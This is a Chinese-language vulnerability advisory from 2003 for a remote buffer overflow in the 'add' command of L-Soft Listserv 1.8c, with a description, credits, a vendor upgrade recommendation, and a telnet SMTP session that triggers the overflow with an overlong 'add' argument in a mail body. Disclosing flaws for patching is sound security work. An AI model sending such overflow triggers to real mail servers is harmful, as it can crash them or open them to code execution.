L-Soft Listserv SMTP远程缓冲区溢出漏洞
发布日期:2003-02-06
更新日期:2003-02-11
受影响系统:L-Soft Listserv 1.8c
描述:
BUGTRAQ ID:
6790
CVE(CAN) ID:
CVE-1999-0252
L-Soft Listserv是一款流行的邮件列表管理程序。
Listserv对'add'命令参数缺少正确的边界缓冲区检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以Listserv进程权限在系统上执行任意指令。
可以嵌入到邮件体中的'add'命令对用户提供的参数缺少正确检查,提交超长的字符串作为参数可触发缓冲区溢出,精心构建提交参数数据可能以Listserv进程权限在系统上执行任意指令。
<*来源:PLaGuEZ (
root@meat.plaguez.org)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=87602558319108&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
PLaGuEZ (
root@meat.plaguez.org)提供了如下测试方法:
$ telnet xxxxxx.xxx 25
Trying 123.123.123.123...
Connected to 123.123.123.123
Escape character is '^]'.
220 xxxxxx.xxx ESMTP Sendmail 8.8.5/8.8.2; Fri, 20 Jun 1997 08:54:52 -0400
MAIL FROM:
oooops@oooops.org
250 ooops ... Sender ok
RCPT TO: Listserv
250 Listserv ... Recipient ok
DATA
254 Enter mail, end with "." on a line by itself
From: noone
add aaaaaaaaaaaaaaa[...lotsa chars go here]aaaaaaaaaaaaa aaaaaa aaaaaa
.
250 RAFZ04965 Message accepted for delivery
QUIT
221 xxxxxxx.xxx closing connection
建议:
厂商补丁:
L-Soft
------
建议用户升级到最新L-Soft Listserv版本。
http://www.lsoft.com/products/default.asp?item=listserv浏览次数:3847
严重程度:0(网友投票)